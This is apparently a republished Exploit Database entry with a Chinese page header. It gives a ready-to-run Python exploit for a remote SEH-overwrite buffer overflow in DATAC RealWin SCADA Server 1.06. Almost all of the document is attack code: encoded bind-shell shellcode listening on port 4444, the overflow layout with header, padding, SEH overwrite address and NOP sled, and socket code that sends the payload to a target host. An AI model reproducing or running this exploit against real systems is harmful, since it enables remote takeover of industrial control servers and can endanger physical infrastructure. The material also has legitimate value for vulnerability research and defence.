DATAC RealWin SCADA Server 1.06 – Remote Buffer Overflow

• Exploit Database
• 13 阅读

• 作者： blake
  日期： 2010-10-27
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15337/

• # Exploit Title: RealWin SCADA System SEH Overwrite
  # Date: 10-27-10
  # Author: Blake
  # Software Link: http://www.realflex.com/products/realwin/realwin.php
  # Version: 1.06
  # Tested on: Windows XP SP3 running in VMware Workstation (rfx)
  
  import socket, sys
  
  if len(sys.argv)!= 3:
  print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
  sys.exit(0)
   
  host = sys.argv[1]
  port = int(sys.argv[2]) # port 912 by default
  
  # windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
  # LPORT=4444, 
  shellcode =(
  "\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
  "\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
  "\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
  "\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\x1a"
  "\x96\x0e\x70\x61\xca\xf0\x49\xaa\x1f\xf0\x8e\xd7\xef\xa0\x47"
  "\x93\x5d\x55\xe3\xe1\x5d\x54\x23\x6e\xdd\x2e\x46\xb1\xa9\x84"
  "\x49\xe2\x01\x92\x02\x1a\x2a\xfc\xb2\x1b\xff\x1e\x8e\x52\x74"
  "\xd4\x64\x65\x5c\x24\x84\x57\xa0\xeb\xbb\x57\x2d\xf5\xfc\x50"
  "\xcd\x80\xf6\xa2\x70\x93\xcc\xd9\xae\x16\xd1\x7a\x25\x80\x31"
  "\x7a\xea\x57\xb1\x70\x47\x13\x9d\x94\x56\xf0\x95\xa1\xd3\xf7"
  "\x79\x20\xa7\xd3\x5d\x68\x7c\x7d\xc7\xd4\xd3\x82\x17\xb0\x8c"
  "\x26\x53\x53\xd9\x51\x3e\x3c\x2e\x6c\xc1\xbc\x38\xe7\xb2\x8e"
  "\xe7\x53\x5d\xa3\x60\x7a\x9a\xc4\x5b\x3a\x34\x3b\x63\x3b\x1c"
  "\xf8\x37\x6b\x36\x29\x37\xe0\xc6\xd6\xe2\xa7\x96\x78\x5c\x08"
  "\x47\x39\x0c\xe0\x8d\xb6\x73\x10\xae\x1c\x02\x16\x60\x44\x47"
  "\xf1\x81\x7a\x76\x5d\x0f\x9c\x12\x4d\x59\x36\x8a\xaf\xbe\x8f"
  "\x2d\xcf\x94\xa3\xe6\x47\xa0\xad\x30\x67\x31\xf8\x13\xc4\x99"
  "\x6b\xe7\x06\x1e\x8d\xf8\x02\x36\xc4\xc1\xc5\xcc\xb8\x80\x74"
  "\xd0\x90\x72\x14\x43\x7f\x82\x53\x78\x28\xd5\x34\x4e\x21\xb3"
  "\xa8\xe9\x9b\xa1\x30\x6f\xe3\x61\xef\x4c\xea\x68\x62\xe8\xc8"
  "\x7a\xba\xf1\x54\x2e\x12\xa4\x02\x98\xd4\x1e\xe5\x72\x8f\xcd"
  "\xaf\x12\x56\x3e\x70\x64\x57\x6b\x06\x88\xe6\xc2\x5f\xb7\xc7"
  "\x82\x57\xc0\x35\x33\x97\x1b\xfe\x43\xd2\x01\x57\xcc\xbb\xd0"
  "\xe5\x91\x3b\x0f\x29\xac\xbf\xa5\xd2\x4b\xdf\xcc\xd7\x10\x67"
  "\x3d\xaa\x09\x02\x41\x19\x29\x07")
  
  
  head = "\x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00"
  junk = "\x41" * 228
  next_seh = "\xeb\x06\x90\x90"	# overwrites next seh
  seh = "\xea\xe3\x02\x40" 		# seh overwritten at 232 bytes - 4002e3ea
  nops = "\x90" * 20				# nop sled
  junk2 = "\x42" * (7972 - len(shellcode)) # 1740 bytes for shellcode
  
  print "\n====================================" 
  print "DATAC RealWin 1.06 Buffer Overflow"
  print "Written by Blake"
  print "Discovered by Luigi Auriemma"
  print "Tested on Windows XP SP3"
  print "====================================\n"
   
  print "[*] Connecting to %s on port %d" % (host,port)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try:
  s.connect((host,port))
  except:
  print "[x] Error establishing connection\n"
  sys.exit(0)
   
  print "[*] Sending payload"
  s.send(head + junk + next_seh + seh + nops + shellcode + junk2 + "\r\n")
  s.close()
  print "[*] Payload sent"
  raw_input("[*] Press any key to exit...\n")